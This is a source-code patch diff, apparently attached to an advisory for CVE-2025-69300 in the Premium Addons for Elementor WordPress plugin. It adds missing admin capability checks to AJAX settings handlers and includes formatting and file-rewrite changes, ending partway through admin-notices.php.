CVE-2025-69300: Premium Addons for Elementor <= 4.11.63 – Missing Authorization to Authenticated (Subscriber+) Settings Update (premium-addons-for-elementor)

--- a/premium-addons-for-elementor/addons/display-conditions.php
+++ b/premium-addons-for-elementor/addons/display-conditions.php
@@ -44,7 +44,6 @@

 	/**
 	 * Constructor
-	 *
 	 */
 	public function __construct() {

@@ -113,7 +112,7 @@
 				'acf_choice'  => __( 'Choice', 'premium-addons-for-elementor' ),
 				'acf_text'    => __( 'Text', 'premium-addons-for-elementor' ),
 				'acf_boolean' => __( 'True/False', 'premium-addons-for-elementor' ),
-			)
+			),
 		);

 		$options['woocommerce'] = array(
@@ -129,7 +128,7 @@
 				'woo_total_price'       => __( 'Amount In Cart', 'premium-addons-for-elementor' ),
 				'woo_cart_products'     => __( 'Products In Cart', 'premium-addons-for-elementor' ),
 				'woo_purchase_products' => __( 'Purchased Products', 'premium-addons-for-elementor' ),
-			)
+			),
 		);

 		$options = apply_filters( 'pa_display_conditions', $options );
@@ -263,23 +262,6 @@
 				),
 			)
 		);
-
-		$repeater->add_control(
-			'pa_condition_loc_method',
-			array(
-				'label'       => __( 'Location Detect Method', 'premium-addons-for-elementor' ),
-				'type'        => Controls_Manager::SELECT,
-				'default'     => 'old',
-				'label_block' => true,
-				'options'     => array(
-					'old' => __( 'Old', 'premium-addons-for-elementor' ),
-					'new' => __( 'New', 'premium-addons-for-elementor' ),
-				),
-				'condition'   => array(
-					'pa_condition_key' => 'ip_location',
-				),
-			)
-		);

 		$values = $repeater->get_controls();

--- a/premium-addons-for-elementor/admin/includes/admin-bar.php
+++ b/premium-addons-for-elementor/admin/includes/admin-bar.php
@@ -1,170 +1,169 @@
-<?php
-/**
- * PA Admin Bar
- */
-
-namespace PremiumAddonsAdminIncludes;
-
-use PremiumAddonsIncludesHelper_Functions;
-use PremiumAddonsAdminIncludesAdmin_Helper;
-
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-
-/**
- * Class Admin_Bar
- */
-class Admin_Bar {
-
-	/**
-	 * Class instance
-	 *
-	 * @var instance
-	 */
-	private static $instance = null;
-
-	/**
-	 * Constructor for the class
-	 */
-	public function __construct() {
-
-		add_action( 'admin_bar_menu', array( $this, 'add_toolbar_items' ), 500 );
-
-		add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_frontend_assets' ) );
-
-	}
-
-	public function enqueue_frontend_assets() {
-
-		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
-			return;
-		}
-
-		wp_enqueue_style(
-			'pa-admin-bar',
-			PREMIUM_ADDONS_URL . 'admin/assets/css/admin-bar.css',
-			array(),
-			PREMIUM_ADDONS_VERSION,
-			'all'
-		);
-
-		wp_enqueue_script(
-			'pa-admin-bar',
-			PREMIUM_ADDONS_URL . 'admin/assets/js/admin-bar.js',
-			array( 'jquery' ),
-			PREMIUM_ADDONS_VERSION,
-			true
-		);
-
-		wp_localize_script(
-			'pa-admin-bar',
-			'PaDynamicAssets',
-			array(
-				'nonce'   => wp_create_nonce( 'pa-generate-nonce' ),
-				'post_id' => get_queried_object_id(),
-				'ajaxurl' => admin_url( 'admin-ajax.php' ),
-			)
-		);
-	}
-
-	public function add_toolbar_items( WP_Admin_Bar $admin_bar ) {
-
-		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
-			return;
-		}
-
-		$icon = '<i class="dashicons dashicons-update-alt"></i> ';
-
-		$admin_bar->add_menu(
-			array(
-				'id'    => 'premium-addons',
-				'title' => $icon . __( ' Clear PA Assets', 'premium-addons-for-elementor' ),
-				'href'  => $this->get_dashboard_widgets_link(),
-				'meta'  => array(
-					'title' => __( 'Premium Addons', 'premium-addons-for-elementor' ),
-				),
-			)
-		);
-
-		if ( is_singular() ) {
-			$admin_bar->add_menu(
-				array(
-					'id'     => 'pa-clear-page-cache',
-					'parent' => 'premium-addons',
-					'title'  => $icon . __( 'Clear Page Generated Assets', 'premium-addons-for-elementor' ),
-					'href'   => '#',
-					'meta'   => array(
-						'class' => 'pa-clear-cache pa-clear-page-cache',
-					),
-				)
-			);
-		}
-
-		$admin_bar->add_menu(
-			array(
-				'id'     => 'pa-clear-all-cache',
-				'parent' => 'premium-addons',
-				'title'  => $icon . __( 'Clear All Generated Assets', 'premium-addons-for-elementor' ),
-				'href'   => '#',
-				'meta'   => array(
-					'class' => 'pa-clear-cache pa-clear-all-cache',
-				),
-			)
-		);
-
-		$doc_icon = '<i class="dashicons dashicons-editor-help"></i> ';
-
-		$admin_bar->add_menu(
-			array(
-				'id'     => 'pa-feature-doc',
-				'parent' => 'premium-addons',
-				'title'  => $doc_icon . __( 'Learn More', 'premium-addons-for-elementor' ),
-				'href'   => 'https://premiumaddons.com/docs/elementor-dynamic-assets-generate-loading/',
-				'meta'   => array(
-					'target' => '_blank',
-				),
-			)
-		);
-	}
-
-	/**
-	 * Get Dashboard Widgets Link
-	 *
-	 * Returns links for Widgets & Addons dashboard tab.
-	 *
-	 * @since 4.9.4
-	 * @access private
-	 *
-	 * @return string tab link.
-	 */
-	private function get_dashboard_widgets_link() {
-
-		return add_query_arg(
-			array(
-				'page' => 'premium-addons',
-				'#tab' => 'elements',
-			),
-			esc_url( admin_url( 'admin.php' ) )
-		);
-	}
-
-	/**
-	 * Creates and returns an instance of the class
-	 *
-	 * @since 3.20.9
-	 * @access public
-	 *
-	 * @return object
-	 */
-	public static function get_instance() {
-
-		if ( ! isset( self::$instance ) ) {
-
-			self::$instance = new self();
-
-		}
-
-		return self::$instance;
-	}
-}
+<?php
+/**
+ * PA Admin Bar
+ */
+
+namespace PremiumAddonsAdminIncludes;
+
+use PremiumAddonsIncludesHelper_Functions;
+use PremiumAddonsAdminIncludesAdmin_Helper;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+/**
+ * Class Admin_Bar
+ */
+class Admin_Bar {
+
+	/**
+	 * Class instance
+	 *
+	 * @var instance
+	 */
+	private static $instance = null;
+
+	/**
+	 * Constructor for the class
+	 */
+	public function __construct() {
+
+		add_action( 'admin_bar_menu', array( $this, 'add_toolbar_items' ), 500 );
+
+		add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_frontend_assets' ) );
+	}
+
+	public function enqueue_frontend_assets() {
+
+		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
+			return;
+		}
+
+		wp_enqueue_style(
+			'pa-admin-bar',
+			PREMIUM_ADDONS_URL . 'admin/assets/css/admin-bar.css',
+			array(),
+			PREMIUM_ADDONS_VERSION,
+			'all'
+		);
+
+		wp_enqueue_script(
+			'pa-admin-bar',
+			PREMIUM_ADDONS_URL . 'admin/assets/js/admin-bar.js',
+			array( 'jquery' ),
+			PREMIUM_ADDONS_VERSION,
+			true
+		);
+
+		wp_localize_script(
+			'pa-admin-bar',
+			'PaDynamicAssets',
+			array(
+				'nonce'   => wp_create_nonce( 'pa-generate-nonce' ),
+				'post_id' => get_queried_object_id(),
+				'ajaxurl' => admin_url( 'admin-ajax.php' ),
+			)
+		);
+	}
+
+	public function add_toolbar_items( WP_Admin_Bar $admin_bar ) {
+
+		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
+			return;
+		}
+
+		$icon = '<i class="dashicons dashicons-update-alt"></i> ';
+
+		$admin_bar->add_menu(
+			array(
+				'id'    => 'premium-addons',
+				'title' => $icon . __( ' Clear PA Assets', 'premium-addons-for-elementor' ),
+				'href'  => $this->get_dashboard_widgets_link(),
+				'meta'  => array(
+					'title' => __( 'Premium Addons', 'premium-addons-for-elementor' ),
+				),
+			)
+		);
+
+		if ( is_singular() ) {
+			$admin_bar->add_menu(
+				array(
+					'id'     => 'pa-clear-page-cache',
+					'parent' => 'premium-addons',
+					'title'  => $icon . __( 'Clear Page Generated Assets', 'premium-addons-for-elementor' ),
+					'href'   => '#',
+					'meta'   => array(
+						'class' => 'pa-clear-cache pa-clear-page-cache',
+					),
+				)
+			);
+		}
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'pa-clear-all-cache',
+				'parent' => 'premium-addons',
+				'title'  => $icon . __( 'Clear All Generated Assets', 'premium-addons-for-elementor' ),
+				'href'   => '#',
+				'meta'   => array(
+					'class' => 'pa-clear-cache pa-clear-all-cache',
+				),
+			)
+		);
+
+		$doc_icon = '<i class="dashicons dashicons-editor-help"></i> ';
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'pa-feature-doc',
+				'parent' => 'premium-addons',
+				'title'  => $doc_icon . __( 'Learn More', 'premium-addons-for-elementor' ),
+				'href'   => 'https://premiumaddons.com/docs/elementor-dynamic-assets-generate-loading/',
+				'meta'   => array(
+					'target' => '_blank',
+				),
+			)
+		);
+	}
+
+	/**
+	 * Get Dashboard Widgets Link
+	 *
+	 * Returns links for Widgets & Addons dashboard tab.
+	 *
+	 * @since 4.9.4
+	 * @access private
+	 *
+	 * @return string tab link.
+	 */
+	private function get_dashboard_widgets_link() {
+
+		return add_query_arg(
+			array(
+				'page' => 'premium-addons',
+				'#tab' => 'elements',
+			),
+			esc_url( admin_url( 'admin.php' ) )
+		);
+	}
+
+	/**
+	 * Creates and returns an instance of the class
+	 *
+	 * @since 3.20.9
+	 * @access public
+	 *
+	 * @return object
+	 */
+	public static function get_instance() {
+
+		if ( ! isset( self::$instance ) ) {
+
+			self::$instance = new self();
+
+		}
+
+		return self::$instance;
+	}
+}
--- a/premium-addons-for-elementor/admin/includes/admin-helper.php
+++ b/premium-addons-for-elementor/admin/includes/admin-helper.php
@@ -461,7 +461,7 @@

 		check_ajax_referer( 'pa-menu-nonce', 'security' );

-		if ( ! current_user_can( 'manage_options' ) ) {
+		if ( ! self::check_user_can( 'manage_options' ) ) {
 			wp_send_json_error( 'User is not authorized!' );
 		}

@@ -486,7 +486,7 @@

 		check_ajax_referer( 'pa-menu-nonce', 'security' );

-		if ( ! current_user_can( 'manage_options' ) ) {
+		if ( ! self::check_user_can( 'manage_options' ) ) {
 			wp_send_json_error( 'User is not authorized!' );
 		}

@@ -517,7 +517,7 @@

 		check_ajax_referer( 'pa-live-editor', 'security' );

-		if ( ! current_user_can( 'edit_theme_options' ) ) {
+		if ( ! self::check_user_can( 'edit_theme_options' ) ) {
 			wp_send_json_error( 'Insufficient user permission' );
 		}

@@ -933,6 +933,10 @@

 		check_ajax_referer( 'pa-settings-tab', 'security' );

+		if ( ! self::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
+		}
+
 		if ( ! isset( $_POST['fields'] ) ) {
 			return;
 		}
@@ -1002,6 +1006,10 @@

 		check_ajax_referer( 'pa-settings-tab', 'security' );

+		if ( ! self::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
+		}
+
 		if ( ! isset( $_POST['fields'] ) ) {
 			return;
 		}
@@ -1035,6 +1043,10 @@

 		check_ajax_referer( 'pa-settings-tab', 'security' );

+		if ( ! self::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
+		}
+
 		if ( ! isset( $_POST['isGlobalOn'] ) ) {
 			wp_send_json_error();
 		}
@@ -1433,7 +1445,7 @@

 		check_ajax_referer( 'pa-disable-unused', 'security' );

-		if ( ! current_user_can( 'install_plugins' ) ) {
+		if ( ! self::check_user_can( 'install_plugins' ) ) {
 			wp_send_json_error();
 		}

@@ -1506,6 +1518,10 @@

 		check_ajax_referer( 'pa-settings-tab', 'security' );

+		if ( ! self::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
+		}
+
 		update_option( 'elementor_use_mini_cart_template', 'no' );

 		wp_send_json_success( 'Elementor Mini Cart Template Disabled.' );
@@ -1527,7 +1543,7 @@

 		check_ajax_referer( 'pa-site-cursor-nonce', 'security' );

-		if ( ! current_user_can( 'manage_options' ) ) {
+		if ( ! self::check_user_can( 'manage_options' ) ) {
 			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
 		}

--- a/premium-addons-for-elementor/admin/includes/admin-notices.php
+++ b/premium-addons-for-elementor/admin/includes/admin-notices.php
@@ -1,736 +1,734 @@
-<?php
-/**
- * PA Admin Notices.
- */
-
-namespace PremiumAddonsAdminIncludes;
-
-use PremiumAddonsIncludesHelper_Functions;
-
-if ( ! defined( 'ABSPATH' ) ) {
-	exit();
-}
-
-/**
- * Class Admin_Notices
- */
-class Admin_Notices {
-
-	/**
-	 * Premium Addons Stories
-	 *
-	 * @var stories
-	 */
-	private $stories = array();
-
-	/**
-	 * Class object
-	 *
-	 * @var instance
-	 */
-	private static $instance = null;
-
-	/**
-	 * Elementor slug
-	 *
-	 * @var elementor
-	 */
-	private static $elementor = 'elementor';
-
-	/**
-	 * PAPRO Slug
-	 *
-	 * @var papro
-	 */
-	private static $papro = 'premium-addons-pro';
-
-	/**
-	 * Notices Keys
-	 *
-	 * @var notices
-	 */
-	private static $notices = null;
-
-	/**
-	 * Constructor for the class
-	 */
-	public function __construct() {
-
-		add_action( 'admin_init', array( $this, 'init' ) );
-
-		add_action( 'admin_notices', array( $this, 'admin_notices' ) );
-
-		add_action( 'admin_enqueue_scripts', array( $this, 'admin_enqueue_scripts' ) );
-
-		add_action( 'wp_ajax_pa_reset_admin_notice', array( $this, 'reset_admin_notice' ) );
-
-		add_action( 'wp_ajax_pa_dismiss_admin_notice', array( $this, 'dismiss_admin_notice' ) );
-
-		self::$notices = array(
-			'pa-review',
-			'bf25-last-not'
-		);
-
-		if ( Helper_Functions::check_hide_notifications() ) {
-			return;
-		}
-
-		add_action( 'wp_dashboard_setup', array( $this, 'show_story_widget' ), 111 );
-	}
-
-	/**
-	 * Init
-	 *
-	 * Init required functions
-	 *
-	 * The redirection happens on the first admin page after activation ( the plugins page ).
-	 *
-	 * @since 1.0.0
-	 * @access public
-	 */
-	public function init() {
-
-		$this->handle_review_notice();
-
-		if ( Helper_Functions::check_elementor_version() && get_transient( 'pa_activation_redirect' ) ) {
-
-			delete_transient( 'pa_activation_redirect' );
-
-			$redirect = add_query_arg(
-				array(
-					'page' => 'pa-setup-wizard', // this mean it should've been added first.
-				),
-				admin_url( 'admin.php' )
-			);
-
-			wp_safe_redirect( $redirect );
-
-			exit;
-		}
-	}
-
-	/**
-	 * Init notices check functions.
-	 */
-	public function admin_notices() {
-
-		// Skip rendering notices during AJAX requests.
-		if ( wp_doing_ajax() ) {
-			return;
-		}
-
-		$this->required_plugins_check();
-
-		// Make sure "Already did" was not clicked before.
-		$show_review = get_option( 'pa_review_notice' );
-		if ( '1' !== $show_review ) {
-
-			$cache_key = 'pa_review_notice';
-
-			$response = get_transient( $cache_key );
-
-			if ( false == $response ) {
-				$this->show_review_notice();
-			}
-		}
-
-		if ( Helper_Functions::check_hide_notifications() ) {
-			return;
-		}
-
-		// $this->get_black_friday_notice();
-
-	}
-
-	/**
-	 * Handle Review Notice
-	 *
-	 * Checks if review message is dismissed.
-	 *
-	 * @access public
-	 * @return void
-	 */
-	public function handle_review_notice() {
-
-		if ( ! isset( $_GET['pa_review'] ) ) {
-			return;
-		}
-
-		if ( 'opt_out' === $_GET['pa_review'] ) {
-			check_admin_referer( 'opt_out' );
-
-			update_option( 'pa_review_notice', '1' );
-		}
-
-		wp_safe_redirect( remove_query_arg( 'pa_review' ) );
-
-		exit;
-	}
-
-	/**
-	 * Required plugin check
-	 *
-	 * Shows an admin notice when Elementor is missing.
-	 *
-	 * @since 1.0.0
-	 * @access public
-	 */
-	public function required_plugins_check() {
-
-		// Early return if Elementor is already active.
-		if ( Helper_Functions::check_elementor_version() ) {
-			return;
-		}
-
-		$elementor_path = sprintf( '%1$s/%1$s.php', self::$elementor );
-
-		$message = '';
-
-		if ( ! Helper_Functions::is_plugin_installed( $elementor_path ) ) {
-
-			if ( ! Admin_Helper::check_user_can( 'install_plugins' ) ) {
-				return;
-			}
-
-			$install_url = wp_nonce_url( self_admin_url( sprintf( 'update.php?action=install-plugin&plugin=%s', self::$elementor ) ), 'install-plugin_elementor' );
-
-			$message = sprintf( '<p>%s</p>', __( 'Premium Addons for Elementor is not working because you need to Install Elementor plugin.', 'premium-addons-for-elementor' ) );
-
-			$message .= sprintf( '<p><a href="%s" class="button-primary">%s</a></p>', $install_url, __( 'Install Now', 'premium-addons-for-elementor' ) );
-
-		} elseif ( Admin_Helper::check_user_can( 'activate_plugins' ) ) {
-
-			$activation_url = wp_nonce_url( 'plugins.php?action=activate&plugin=' . $elementor_path . '&plugin_status=all&paged=1&s', 'activate-plugin_' . $elementor_path );
-
-			$message = '<p>' . __( 'Premium Addons for Elementor is not working because you need to activate Elementor plugin.', 'premium-addons-for-elementor' ) . '</p>';
-
-			$message .= '<p>' . sprintf( '<a href="%s" class="button-primary">%s</a>', $activation_url, __( 'Activate Now', 'premium-addons-for-elementor' ) ) . '</p>';
-		} else {
-			return;
-		}
-
-		if ( ! empty( $message ) ) {
-			$this->render_admin_notices( $message );
-		}
-	}
-
-	/**
-	 * Get Review Text
-	 *
-	 * Gets admin review notice HTML.
-	 *
-	 * @since 2.8.4
-	 * @access public
-	 *
-	 * @param string $review_url plugin page.
-	 * @param string $optout_url redirect url.
-	 */
-	public function get_review_text( $review_url, $optout_url ) {
-
-		$notice = sprintf(
-			'<p>' . __( 'Could we take just 2 minutes of your time? We'd be incredibly grateful if you could give ', 'premium-addons-for-elementor' ) .
-			'<b>' . __( 'Premium Addons for Elementor', 'premium-addons-for-elementor' ) . '</b> a 5 Stars Rating on WordPress.org. Your support helps us continue creating even more amazing free features in the future!</p>
-            <div>
-                <a class="button pa-review-btn button-primary" href="%s" target="_blank"><span>' . __( 'Sure, leave a Review', 'premium-addons-for-elementor' ) . '</span></a>
-                <a class="button" href="%2$s"><span>' . __( 'I Already Did', 'premium-addons-for-elementor' ) . '</span></a>
-                <a class="button button-secondary pa-notice-reset"><span>' . __( 'Maybe Later', 'premium-addons-for-elementor' ) . '</span></a>
-            </div>',
-			$review_url,
-			$optout_url
-		);
-
-		return $notice;
-	}
-
-	/**
-	 * Checks if review admin notice is dismissed
-	 *
-	 * @since 2.6.8
-	 * @return void
-	 */
-	public function show_review_notice() {
-
-		$review_url = 'https://wordpress.org/support/plugin/premium-addons-for-elementor/reviews/#new-post';
-
-		$optout_url = wp_nonce_url( add_query_arg( 'pa_review', 'opt_out' ), 'opt_out' );
-		?>
-
-		<div class="error pa-notice-wrap pa-review-notice" data-notice="pa-review">
-			<div class="pa-img-wrap">
-				<img src="<?php echo esc_url( PREMIUM_ADDONS_URL . 'admin/images/pa-logo-symbol.png' ); ?>">
-			</div>
-			<div class="pa-text-wrap">
-				<?php echo wp_kses_post( $this->get_review_text( $review_url, $optout_url ) ); ?>
-			</div>
-			<div class="pa-notice-close">
-				<a href="<?php echo esc_url( $optout_url ); ?>"><span class="dashicons dashicons-dismiss"></span></a>
-			</div>
-		</div>
-
-		<?php
-	}
-
-	public function get_black_friday_notice() {
-
-        $time     = time();
-
-        if ( $time > 1765497600 || '1' === get_option( 'bf25-last-not' ) ) {
-			return;
-		}
-
-		$is_papro_active = Helper_Functions::check_papro_version();
-
-		$license_key = get_option( 'papro_license_key' );
-
-		$link = Helper_Functions::get_campaign_link( 'https://premiumaddons.com/black-friday/#bfdeals', 'wp-dash', 'bf25-notification', 'cm25' );
-
-		$promotion_type = 'new';
-
-        if ( $is_papro_active ) {
-
-			$license_data = get_transient( 'pa_license_info' );
-
-            if( isset( $license_data['status'] ) && 'valid' === $license_data['status'] ) {
-
-				if( isset( $license_data['id'] ) && '4' === $license_data['id'] ) {
-					return;
-				} else {
-
-					$promotion_type = 'upgrade';
-
-					$link = Helper_Functions::get_campaign_link( 'https://premiumaddons.com/docs/upgrade-premium-addons-license/', 'wp-dash', 'bf25-notification', 'cm25' );
-				}
-
-            }
-
-		}
-
-		$message = $this->get_promotion_message( $promotion_type );
-
-		?>
-
-		<div class="error pa-notice-wrap pa-new-feature-notice pa-review-notice">
-			<div class="pa-img-wrap">
-				<img src="<?php echo PREMIUM_ADDONS_URL . 'admin/images/pa-logo-symbol.png'; ?>">
-			</div>
-			<div class="pa-text-wrap">
-				<p>
-					<?php echo wp_kses_post( $message['message'] ); ?>
-					<a class="button pa-cta-btn button-primary" href="<?php echo esc_url( $link ); ?>" target="_blank">
-						<span><?php echo wp_kses_post( $message['cta'] ); ?></span>
-					</a>
-				</p>
-			</div>
-			<div class="pa-notice-close" data-notice="bf25-last-not">
-				<span class="dashicons dashicons-dismiss"></span>
-			</div>
-		</div>
-
-		<?php
-	}
-
-	/**
-	 * Get Promotion Message
-	 *
-	 * @since 4.11.43
-	 * @access private
-	 *
-	 * @param string $type promotion type.
-	 * @return array
-	 */
-	private function get_promotion_message( $type = 'new' ) {
-
-		if ( 'upgrade' === $type ) {
-			return array(
-				'message' => __( 'Get a <b>FLAT 35% OFF</b> when you upgrade to <b>Premium Addons Pro Lifetime</b>. Use code <b>BFUL2025</b> at checkout – <b>expires soon!</b>', 'premium-addons-for-elementor' ),
-				'cta'    => __( 'Upgrade Now', 'premium-addons-for-elementor' ),
-			);
-
-		}
-
-		return array(
-			'message' => __( '<b>Cyber Monday – Save Up To $105 on Premium Addons Pro</b>.', 'premium-addons-for-elementor' ),
-			'cta'    => __( 'Catch The Deal', 'premium-addons-for-elementor' ),
-		);
-	}
-
-	/**
-	 * Renders an admin notice error message
-	 *
-	 * @since 1.0.0
-	 * @access private
-	 *
-	 * @param string $message notice text.
-	 * @param string $class notice class.
-	 * @param string $handle notice handle.
-	 *
-	 * @return void
-	 */
-	private function render_admin_notices( $message, $class = '', $handle = '' ) {
-		?>
-			<div class="error pa-new-feature-notice <?php echo esc_attr( $class ); ?>" data-notice="<?php echo esc_attr( $handle ); ?>">
-				<?php echo wp_kses_post( $message ); ?>
-			</div>
-		<?php
-	}
-
-
-
-	/**
-	 * Register admin scripts
-	 *
-	 * @since 3.2.8
-	 * @access public
-	 */
-	public function admin_enqueue_scripts() {
-
-		// Skip loading scripts during AJAX or REST requests.
-		if ( wp_doing_ajax() || ( defined( 'REST_REQUEST' ) && REST_REQUEST ) ) {
-			return;
-		}
-
-		wp_enqueue_script(
-			'pa-dashboard',
-			PREMIUM_ADDONS_URL . 'admin/assets/js/pa-dashboard.js',
-			array( 'jquery' ),
-			PREMIUM_ADDONS_VERSION,
-			true
-		);
-
-		wp_localize_script(
-			'pa-dashboard',
-			'PaNoticeSettings',
-			array(
-				'ajaxurl' => esc_url( admin_url( 'admin-ajax.php' ) ),
-				'nonce'   => wp_create_nonce( 'pa-notice-nonce' ),
-			)
-		);
-	}
-
-	/**
-	 * Set transient for admin notice
-	 *
-	 * @since 3.2.8
-	 * @access public
-	 *
-	 * @return void
-	 */
-	public function reset_admin_notice() {
-
-		check_ajax_referer( 'pa-notice-nonce', 'nonce' );
-
-		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
-			wp_send_json_error();
-		}
-
-		$key = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
-
-		if ( ! empty( $key ) && in_array( $key, self::$notices, true ) ) {
-
-			$cache_key = 'pa_review_notice';
-
-			set_transient( $cache_key, true, WEEK_IN_SECONDS );
-
-			wp_send_json_success();
-
-		} else {
-
-			wp_send_json_error();
-
-		}
-	}
-
-	/**
-	 * Dismiss admin notice
-	 *
-	 * @since 3.11.7
-	 * @access public
-	 *
-	 * @return void
-	 */
-	public function dismiss_admin_notice() {
-
-		check_ajax_referer( 'pa-notice-nonce', 'nonce' );
-
-		if ( ! current_user_can( 'manage_options' ) ) {
-			wp_send_json_error();
-		}
-
-		$key = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
-
-		if ( ! empty( $key ) && in_array( $key, self::$notices, true ) ) {
-
-			// Make sure new features notices will not appear again.
-			if ( false != strpos( $key, 'not' ) ) {
-				update_option( $key, '1' );
-			} else {
-				set_transient( $key, true, 20 * DAY_IN_SECONDS );
-
-			}
-
-			wp_send_json_success();
-
-		} else {
-
-			wp_send_json_error();
-
-		}
-	}
-
-	/**
-	 * Check Status
-	 *
-	 * @since 4.10.15
-	 * @access public
-	 */
-	public function check_status( $key ) {
-
-		$status = false;
-
-		$api_params = array(
-			'edd_action' => 'check_license',
-			'license'    => $key,
-			'item_id'    => 361,
-		);
-
-		$response = wp_remote_get(
-			'http://my.leap13.com',
-			array(
-				'timeout'   => 15,
-				'sslverify' => false,
-				'body'      => $api_params,
-			)
-		);
-
-		if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
-			return false;
-		}
-
-		$body = wp_remote_retrieve_body( $response );
-
-		$body = json_decode( $body, true );
-
-		if ( isset( $body['license'] ) && 'valid' === $body['license'] ) {
-			$status = true;
-		}
-
-		return $status;
-	}
-
-	/**
-	 * Get PA Stories
-	 *
-	 * Gets a list of the latest three blog posts
-	 *
-	 * @since 4.10.64
-	 *
-	 * @access public
-	 */
-	public function get_pa_stories() {
-
-		$stories = get_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION );
-
-		if ( ! $stories ) {
-
-			$api_url = 'https://premiumaddons.com/wp-json/stories/v2/get';
-
-			$response = wp_remote_get(
-				$api_url,
-				array(
-					'timeout'   => 15,
-					'sslverify' => true,
-				)
-			);
-
-			if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
-				set_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION, true, WEEK_IN_SECONDS );
-				return false;
-			}
-
-			$body    = wp_remote_retrieve_body( $response );
-			$stories = json_decode( $body, true );
-
-			set_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION, $stories, WEEK_IN_SECONDS );
-
-		}
-
-		$this->stories = $stories;
-
-		return $stories;
-	}
-
-	public function show_story_widget() {
-
-		$stories = $this->get_pa_stories();
-
-		if ( ! is_array( $stories ) || empty( $stories ) ) {
-			return;
-		}
-
-		wp_add_dashboard_widget(
-			'pa-stories',
-			__( 'Premium Addons News', 'premium-addons-for-elementor' ),
-			array( $this, 'show' ),
-			null,
-			null,
-			'column3',
-			'core'
-		);
-	}
-
-
-	public function show() {
-
-		$stories = $this->stories;
-
-		$time = time();
-
-		$papro_path = 'premium-addons-pro/premium-addons-pro-for-elementor.php';
-
-		$license_data = get_transient( 'pa_license_info' );
-		$highlight = false;
-
-		if( isset( $license_data['status'] ) && 'valid' === $license_data['status'] ) {
-
-			if( isset( $license_data['id'] ) && '4' !== $license_data['id'] ) {
-
-				$highlight = true;
-				array_unshift( $stories['posts'], array(
-					'title' => 'Switch to Premium Addons Pro Lifetime, Pay the Difference & Save 30% Today!',
-					'link'  => Helper_Functions::get_campaign_link( 'https://premiumaddons.com/docs/upgrade-premium-addons-license/', 'wp-dash', 'xmas25-dash-widget', 'xmas25' ),
-				) );
-
-			}
-
-		}
-
-
-		?>
-			<style>
-				.pa-banners-grid {
-					margin-bottom: 10px;
-				}
-
-				.pa-stories-banner {
-					position: relative;
-				}
-
-				.pa-stories-banner a {
-					position: absolute;
-					inset: 0;
-				}
-
-				.pa-story-img-container img {
-					width: 100%;
-					display: block;
-				}
-
-				.pa-news-post {
-					margin-bottom: 5px;
-				}
-
-				.pa-news-post a {
-					font-weight: 500;
-					color: #0073aa;
-					text-decoration: none;
-					padding-bottom: 5px;
-					display: inline-block;
-				}
-
-				.pa-dashboard-widget-block {
-					width: 100%;
-				}
-
-				.pa-footer-bar {
-					border-top: 1px solid #eee;
-					padding-top: 1rem;
-					display: flex;
-					justify-content: space-between;
-				}
-
-				.pa-dashboard-widget-block a {
-					text-decoration: none;
-					font-size: 13px;
-					color: #007cba;
-				}
-
-				.pa-dashboard-widget-block .dashicons {
-					vertical-align: middle;
-					font-size: 17px;
-				}
-			</style>
-
-
-			<div class="pa-banners-grid">
-
-				<?php foreach ( $stories['banners'] as $index => $banner ) : ?>
-
-					<?php if ( isset( $banner['end'] ) && $time < $banner['end'] ) : ?>
-
-						<div class="pa-stories-banner">
-							<div class="pa-story-img-container">
-								<img src="<?php echo esc_url( $banner['image'] ); ?>" alt="<?php echo esc_attr( $banner['description'] ); ?>">
-							</div>
-							<a href="<?php echo esc_url( Helper_Functions::get_campaign_link( $banner['link'], 'wp-dash', 'dash-widget', 'xmas25' ) ); ?>" target="_blank" title="<?php echo esc_attr( $banner['description'] ); ?>"></a>
-						</div>
-
-					<?php endif; ?>
-
-				<?php endforeach; ?>
-
-			</div>
-
-
-			<div class="pa-posts-grid">
-
-				<?php foreach ( $stories['posts'] as $index => $post ) : ?>
-
-					<div class="pa-news-post">
-						<a style="<?php echo 0 === $index && $highlight ? 'color: #93003f' : '' ?>" target="_blank" href="<?php echo esc_url( $post['link'] ); ?>">
-							<?php echo wp_kses_post( $post['title'] ); ?>
-						</a>
-					</div>
-
-				<?php endforeach; ?>
-
-			</div>
-
-			<div class="pa-dashboard-widget-block">
-				<div class="pa-footer-bar">
-					<a href="https://wordpress.org/support/plugin/premium-addons-for-elementor/" target="_blank" style="color: #27ae60">
-						Need Help?
-						<span aria-hidden="true" class="dashicons dashicons-external"></span>
-					</a>
-					<a href="https://www.youtube.com/leap13" target="_blank" style="color: #e1002d">
-						YouTube Channel
-						<span aria-hidden="true" class="dashicons dashicons-youtube"></span>
-					</a>
-					<a href="https://www.facebook.com/groups/PremiumAddons" target="_blank" style="color: #1877F2;">
-						Facebook Community
-						<span aria-hidden="true" class="dashicons dashicons-facebook-alt"></span>
-					</a>
-				</div>
-			</div>
-
-		<?php
-	}
-
-	/**
-	 * Creates and returns an instance of the class
-	 *
-	 * @since 2.8.4
-	 * @access public
